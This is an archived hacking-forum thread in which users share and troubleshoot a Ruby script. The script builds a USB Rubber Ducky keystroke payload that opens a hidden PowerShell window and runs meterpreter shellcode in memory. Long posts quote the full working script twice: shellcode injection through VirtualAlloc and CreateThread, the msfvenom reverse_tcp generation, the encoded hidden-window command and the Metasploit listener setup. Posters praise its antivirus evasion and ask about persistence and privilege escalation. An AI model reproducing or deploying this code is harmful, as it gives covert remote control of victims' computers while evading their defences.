Jump to content

Archived

This topic is now archived and is closed to further replies.

b00stfr3ak

[Payload] Reverse Powershell Script

Recommended Posts

Hey,

I created a script that will create a reverse meterpreter connection all in memory using powershell. This is the same attack that SET uses with the teensy board, so I thought I would bring it over to the ducky. The code is at https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky

Seems like github has messed with the formatting a little but shouldn't be a problem.

Try it out and let me know what you guys think.

EDIT:

Added what the script looks like when ran.

ruby reverse_powershell_ducky.rb 
[!] Enter the host ip to listen on: 192.168.1.1
[+] Using 192.168.1.1 as server
[!] Enter the port you would like to use or leave blank for [443]: 8080
[+] Using 8080
[*] Generating shellcode
[*] Writing to file
[+] File Complete
[!] Would you like to start the listener?[yes/no] no
[*] Compile powershell_reverse_ducky.txt with duckencode.jar
[*] Good Bye!

or

ruby reverse_powershell_ducky.rb                                                                                              
[!] Enter the host ip to listen on: 192.168.1.1
[+] Using 192.168.1.1 as server
[!] Enter the port you would like to use or leave blank for [443]: 
[+] Using 443
[*] Generating shellcode
[*] Writing to file
[+] File Complete
[!] Would you like to start the listener?[yes/no] yes
[*] Compile powershell_reverse_ducky.txt with duckencode.jar
[*] Setting up Metasploit this may take a moment

Share this post


Link to post
Share on other sites

I've never used ruby before, I ran the script, now I don't know where the script dumped the file to. Am I looking for a .txt, or a .bin?

Share this post


Link to post
Share on other sites

should be called: powershell_reverse_ducky.txt

Share this post


Link to post
Share on other sites

I've also never used metasploit before, which is why I didn't know that I would have needed it to run this script. At least I now know what went wrong, I will fix my error promptly.

J:\Powershell-Reverse-Rubber-Ducky-master>reverse_powershell_ducky.rb
[!] Enter the host ip to listen on: 192.168.1.1
[+] Using 192.168.1.1 as server
[!] Enter the port you would like to use or leave blank for [443]: 8080
[+] Using 8080
[*] Generating shellcode
J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``':
 No such file or directory - /opt/metasploit-framework/./msfvenom --payload wind
ows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 C (Errno::ENOENT)
        from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.
rb:44:in `shellcode_gen'
        from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.
rb:83:in `<main>'

J:\Powershell-Reverse-Rubber-Ducky-master>

Share this post


Link to post
Share on other sites

Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/

I'm not sure if it uses the same technique but it's another great resource.

Looks like they use vb to create an exe and execute that, which may be caught by av when created. But any ways it was fun writing it. I have something planned that I hope to release this weekend.

Share this post


Link to post
Share on other sites

The script takes a powershell command with meterpreter shellcode and base64 encodes it. From there the ducky launches cmd, and then powershell -encodedCommand (payload) directly into memory. This bypasses all AV.

The powershell technique was created by Matthew Graeber http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html

The downgrade from x64 to x86 for powershell was created by Dave Kennedy https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/

Share this post


Link to post
Share on other sites

Great script, I am super excited to test this one out :D

One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:

[*] Generating shellcode
/root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)
from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'

Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)

Share this post


Link to post
Share on other sites

Great script, I am super excited to test this one out :D

One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:

[*] Generating shellcode

/root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)

from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'

from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'

Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)

Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

Share this post


Link to post
Share on other sites

Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :)

Share this post


Link to post
Share on other sites

Awesome script dude, I also had no idea about the encodedCommand cmdlet. Think I have some changes to make to the DuckToolkit!

Share this post


Link to post
Share on other sites

Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

Everything appears to have been successful on the client side; but I dont get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue.

EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.

Share this post


Link to post
Share on other sites

Yeah, all depends on what the priv you ran the script under, so UAC could be added and from there you could do what ever you wanted to the system.

Share this post


Link to post
Share on other sites

This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error:

[*] Generating shellcode
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders
reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
from reverse_powershell_ducky.rb:51:in `clean_shellcode'
from reverse_powershell_ducky.rb:45:in `shellcode_gen'
from reverse_powershell_ducky.rb:90:in `<main>'

Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability

Also, would it be possible to have this script accept domain names as well as IP addresses?

Share this post


Link to post
Share on other sites

This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error:

[*] Generating shellcode

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 0 compatible encoders

reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)

from reverse_powershell_ducky.rb:51:in `clean_shellcode'

from reverse_powershell_ducky.rb:45:in `shellcode_gen'

from reverse_powershell_ducky.rb:90:in `<main>'

Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability

Also, would it be possible to have this script accept domain names as well as IP addresses?

Sorry havn't checked this in a long time. I'll try to take a look tonight, should be simple. Take a look at https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ for the time being, fast meterpreter is the same concept but finishes in seconds. I plan on re-writting that because the code is real bad. Does the script fail with DNS names? It should just pass everything to metasploit.

Share this post


Link to post
Share on other sites

Looks like I'll have to get back into some metasploit work!

Share this post


Link to post
Share on other sites

Ducky reverse shell doesn't work

I have used the following script, that i know used to work and now doesn't.

I modified it abit from the original download to hide the cmd window as the shellcode is being typed.
It worked like a charm but now its not working. Here is the script:

#!/usr/bin/env ruby
# Thanks to @mattifestation exploit-monday.com and Dave Kennedy.
# Written by James Cook @b00stfr3ak44
require 'base64'
def print_error(text)
  print "\e[31m[-]\e[0m #{text}"
end
def print_success(text)
  print "\e[32m[+]\e[0m #{text}"
end
def print_info(text)
  print "\e[34m[*]\e[0m #{text}"
end
def get_input(text)
  print "\e[33m[!]\e[0m #{text}"
end
def get_host()
  host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1]
  ip = host_name.split('.')
  if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil
    print_error("Not a valid IP\n")
    get_host()
  end
  print_success("Using #{host_name} as server\n")
  return host_name
end
def get_port()
  port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1]
  if port == ''
    port = '443'
    print_success("Using #{port}\n")
    return port
  elsif not (1..65535).cover?(port.to_i)
    print_error("Not a valid port\n")
    sleep(1)
    port()
  else
    print_success("Using #{port}\n")
    return port
  end
end
def shellcode_gen(msf_path,host,port)
  print_info("Generating shellcode\n")
  execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C`
  shellcode = clean_shellcode(execute)
  powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";})
  encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n")
  return encoded_command
end
def clean_shellcode(shellcode)
  shellcode = shellcode.gsub('\\',",0")
  shellcode = shellcode.delete("+")
  shellcode = shellcode.delete('"')
  shellcode = shellcode.delete("\n")
  shellcode = shellcode.delete("\s")
  shellcode[0..4] = ''
  return shellcode
end
def ducky_setup(encoded_command)
  print_info("Writing to file\n")
  File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")}
  print_success("File Complete\n")
end
def metasploit_setup(msf_path,host,port)
  print_info("Setting up Metasploit this may take a moment\n")
  rc_file = "msf_listener.rc"
  file = File.open("#{rc_file}",'w')
  file.write("use exploit/multi/handler\n")
  file.write("set PAYLOAD #{@set_payload}\n")
  file.write("set LHOST #{host}\n")
  file.write("set LPORT #{port}\n")
  file.write("set EnableStageEncoding true\n")
  file.write("set ExitOnSession false\n")
  file.write("exploit -j")
  file.close
  system("#{msf_path}./msfconsole -r #{rc_file}")
end
begin
  if File.exist?('/usr/bin/msfvenom')
    msf_path = '/usr/bin/'
  elsif File.exist?("/opt/metasploit-framework/msfvenom")
    msf_path = ('/opt/metasploit-framework/')
  else
    print_error("Metasploit Not Found!")
    exit
  end
  @set_payload = "windows/meterpreter/reverse_tcp"
  host = get_host()
  port = get_port()
  encoded_command = shellcode_gen(msf_path,host,port)
  ducky_setup(encoded_command)
  msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1]
  print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n")
  metasploit_setup(msf_path,host,port) if msf_setup == 'yes'
  print_info("Good Bye!\n")
end

And i get the following error:

root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb
[!] Enter the host ip to listen on: 192.168.0.2
[+] Using 192.168.0.2 as server
[!] Enter the port you would like to use or leave blank for [443]: 443
[+] Using 443 [*] Generating shellcode
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders
./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode'
from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen'
from ./reverse_powershell_ducky2.rb:90:in `<main>'
root@SystemCrash86:/usr/share/simple-ducky/payloads#

Everything is uptodate and this script used to work but now i get those errors

Share this post


Link to post
Share on other sites

Ducky reverse shell doesn't work

I have used the following script, that i know used to work and now doesn't.

I modified it abit from the original download to hide the cmd window as the shellcode is being typed.

It worked like a charm but now its not working. Here is the script:

#!/usr/bin/env ruby
# Thanks to @mattifestation exploit-monday.com and Dave Kennedy.
# Written by James Cook @b00stfr3ak44
require 'base64'
def print_error(text)
  print "\e[31m[-]\e[0m #{text}"
end
def print_success(text)
  print "\e[32m[+]\e[0m #{text}"
end
def print_info(text)
  print "\e[34m[*]\e[0m #{text}"
end
def get_input(text)
  print "\e[33m[!]\e[0m #{text}"
end
def get_host()
  host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1]
  ip = host_name.split('.')
  if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil
    print_error("Not a valid IP\n")
    get_host()
  end
  print_success("Using #{host_name} as server\n")
  return host_name
end
def get_port()
  port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1]
  if port == ''
    port = '443'
    print_success("Using #{port}\n")
    return port
  elsif not (1..65535).cover?(port.to_i)
    print_error("Not a valid port\n")
    sleep(1)
    port()
  else
    print_success("Using #{port}\n")
    return port
  end
end
def shellcode_gen(msf_path,host,port)
  print_info("Generating shellcode\n")
  execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C`
  shellcode = clean_shellcode(execute)
  powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";})
  encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n")
  return encoded_command
end
def clean_shellcode(shellcode)
  shellcode = shellcode.gsub('\\',",0")
  shellcode = shellcode.delete("+")
  shellcode = shellcode.delete('"')
  shellcode = shellcode.delete("\n")
  shellcode = shellcode.delete("\s")
  shellcode[0..4] = ''
  return shellcode
end
def ducky_setup(encoded_command)
  print_info("Writing to file\n")
  File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")}
  print_success("File Complete\n")
end
def metasploit_setup(msf_path,host,port)
  print_info("Setting up Metasploit this may take a moment\n")
  rc_file = "msf_listener.rc"
  file = File.open("#{rc_file}",'w')
  file.write("use exploit/multi/handler\n")
  file.write("set PAYLOAD #{@set_payload}\n")
  file.write("set LHOST #{host}\n")
  file.write("set LPORT #{port}\n")
  file.write("set EnableStageEncoding true\n")
  file.write("set ExitOnSession false\n")
  file.write("exploit -j")
  file.close
  system("#{msf_path}./msfconsole -r #{rc_file}")
end
begin
  if File.exist?('/usr/bin/msfvenom')
    msf_path = '/usr/bin/'
  elsif File.exist?("/opt/metasploit-framework/msfvenom")
    msf_path = ('/opt/metasploit-framework/')
  else
    print_error("Metasploit Not Found!")
    exit
  end
  @set_payload = "windows/meterpreter/reverse_tcp"
  host = get_host()
  port = get_port()
  encoded_command = shellcode_gen(msf_path,host,port)
  ducky_setup(encoded_command)
  msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1]
  print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n")
  metasploit_setup(msf_path,host,port) if msf_setup == 'yes'
  print_info("Good Bye!\n")
end

And i get the following error:

root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb

[!] Enter the host ip to listen on: 192.168.0.2

[+] Using 192.168.0.2 as server

[!] Enter the port you would like to use or leave blank for [443]: 443

[+] Using 443

[*] Generating shellcode

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 0 compatible encoders

./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)

from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode'

from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen'

from ./reverse_powershell_ducky2.rb:90:in `<main>'

root@SystemCrash86:/usr/share/simple-ducky/payloads#

Everything is uptodate and this script used to work but now i get those errors

Please do a git pull or just re clone the repo this was fixed last week

Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access?

Not sure what you are asking. This holds the psh script on a web server downloads it in memory and executes it on the machine.

Share this post


Link to post
Share on other sites

I did a fresh clean install of Simple-Ducky Payload Generator. Then i used git clone on https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky.git to get the reverse_powershell_ducky.rb.

Note that everything is upto date and freshly installed and that this script has been cloned from the git hub and i have not made any changes to this one. This script also worked flawlessly on Kali linux 3.12-kali1-amd64 iso without problems but since the update to 3.14-kali1-amd64 it no longer works.

root@SystemCrash86:/usr/share/simple-ducky# ./update.sh
Already up-to-date.
Entering 'misc/dbd'
Switched to branch 'master'
Entering 'misc/dbd'
Already up-to-date.
# On branch master
nothing to commit (working directory clean)

root@SystemCrash86:~/Powershell-Reverse-Rubber-Ducky# ./reverse_powershell_ducky.rb
Enter the host ip to listen on: 192.168.0.2
[+] Using 192.168.0.2 as server
Port you would like to use or leave blank for [443]:
[+] Using 443 [*] Generating shellcode
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders [*] Writing to file
[+] File Complete
Would you like to start the listener?[yes/no] yes [*] Compile powershell_reverse_ducky.txt with duckencode.jar [*] Setting up Metasploit this may take a moment

______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V4 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *

^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
http://metasploit.pro


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing msf_listener.rc for ERB directives.
resource (msf_listener.rc)> use exploit/multi/handler
resource (msf_listener.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (msf_listener.rc)> set LHOST 192.168.0.2
LHOST => 192.168.0.2
resource (msf_listener.rc)> set LPORT 443
LPORT => 443
resource (msf_listener.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (msf_listener.rc)> set ExitOnSession false
ExitOnSession => false
resource (msf_listener.rc)> exploit -j
[-] Exploit failed: undefined method `const_defined?' for nil:NilClass
msf exploit(handler) >

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...